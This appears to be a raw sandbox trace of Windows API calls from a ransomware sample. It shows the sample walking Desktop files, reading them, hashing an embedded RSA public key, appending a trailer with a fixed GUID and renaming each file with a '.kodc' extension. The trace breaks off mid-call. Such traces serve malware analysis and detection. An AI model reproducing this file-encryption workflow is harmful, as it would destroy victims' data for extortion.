HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a490 | out: hHeap=0x630000) returned 1 [0097.610] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0097.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0097.610] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0097.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693400 | out: hHeap=0x630000) returned 1 [0097.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0097.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0097.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0097.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0097.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0097.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0097.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0097.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a628 | out: hHeap=0x630000) returned 1 [0097.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0097.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0097.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a610 | out: hHeap=0x630000) returned 1 [0097.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5c8 | out: hHeap=0x630000) returned 1 [0097.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0097.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0097.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0097.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a598 | out: hHeap=0x630000) returned 1 [0097.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fc78 | out: hHeap=0x630000) returned 1 [0097.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0097.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0097.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0097.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0097.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0097.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0097.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0097.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0097.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0097.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0097.611] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0x3794, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x3794, lpOverlapped=0x0) returned 1 [0097.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0097.611] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x3799, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.611] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0097.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0097.611] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce208 [0097.612] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333b018 [0097.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333b018, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.612] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333a888 [0097.612] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0097.612] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce208 | out: hHeap=0x630000) returned 1 [0097.612] WriteFile (in: hFile=0x5cc, lpBuffer=0x333a888*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333a888*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0097.612] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0097.612] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.612] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0097.612] CloseHandle (hObject=0x5cc) returned 1 [0097.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693400 [0097.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0097.613] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693400 | out: hHeap=0x630000) returned 1 [0097.613] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4jwDK-_ApAqP4UABdnk.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4jwdk-_apaqp4uabdnk.pps"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4jwDK-_ApAqP4UABdnk.pps.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4jwdk-_apaqp4uabdnk.pps.kodc")) returned 1 [0097.614] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0097.614] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.614] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0097.615] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1da51260, ftCreationTime.dwHighDateTime=0x1d5b88b, ftLastAccessTime.dwLowDateTime=0x6d8d4e60, ftLastAccessTime.dwHighDateTime=0x1d5b97f, ftLastWriteTime.dwLowDateTime=0x6d8d4e60, ftLastWriteTime.dwHighDateTime=0x1d5b97f, nFileSizeHigh=0x0, nFileSizeLow=0x30bd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4v8BPdIlo-.wav", cAlternateFileName="4V8BPD~1.WAV")) returned 1 [0097.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0097.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0097.616] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0097.616] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4v8BPdIlo-.wav") returned=".wav" [0097.616] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4v8BPdIlo-.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4v8bpdilo-.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0097.616] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=12477) returned 1 [0097.616] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0097.619] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x3097, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.619] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0097.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.620] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.620] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x30bd, lpOverlapped=0x0) returned 1 [0097.621] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0097.621] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.621] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.621] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0097.621] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0097.621] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.622] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0097.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0097.622] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0097.622] GetLastError () returned 0x0 [0097.622] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0097.622] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0097.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0097.622] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0097.622] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0097.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.622] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0097.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30c0) returned 0x9b9b950 [0097.622] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0097.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0097.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0097.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fc78 [0097.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a598 [0097.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fa80 [0097.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5c8 [0097.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a610 [0097.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0097.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a628 [0097.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0097.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0097.623] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0097.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0097.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a610 | out: hHeap=0x630000) returned 1 [0097.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a628 | out: hHeap=0x630000) returned 1 [0097.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0097.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0097.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0097.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0097.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0097.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a628 [0097.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0097.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a610 [0097.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0097.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0097.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0097.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0097.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0097.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0097.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0097.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0097.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0097.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a628 | out: hHeap=0x630000) returned 1 [0097.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a610 | out: hHeap=0x630000) returned 1 [0097.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0097.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0097.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0097.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0097.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0097.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.624] GetCurrentThreadId () returned 0x42c [0097.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0097.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x695c78 [0097.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0097.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0097.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0097.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0097.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0097.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.624] GetCurrentThreadId () returned 0x42c [0097.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0097.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0097.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0097.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0097.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0097.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0097.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0097.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0097.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0097.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0097.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0097.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0097.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0097.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a610 [0097.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0097.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0097.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0097.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0097.626] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x30bd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.626] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0097.626] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0097.626] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.626] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0097.626] CloseHandle (hObject=0x5cc) returned 1 [0097.627] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4v8BPdIlo-.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4v8bpdilo-.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4v8BPdIlo-.wav.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4v8bpdilo-.wav.kodc")) returned 1 [0097.628] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0097.628] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.628] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.629] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0097.629] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81956bc0, ftCreationTime.dwHighDateTime=0x1d5b93b, ftLastAccessTime.dwLowDateTime=0x6435e690, ftLastAccessTime.dwHighDateTime=0x1d5c048, ftLastWriteTime.dwLowDateTime=0x6435e690, ftLastWriteTime.dwHighDateTime=0x1d5c048, nFileSizeHigh=0x0, nFileSizeLow=0x77ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9 Vm_5e64ZEi3JJc07u7.flv", cAlternateFileName="9VM_5E~1.FLV")) returned 1 [0097.629] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9 Vm_5e64ZEi3JJc07u7.flv") returned=".flv" [0097.629] CreateFileW 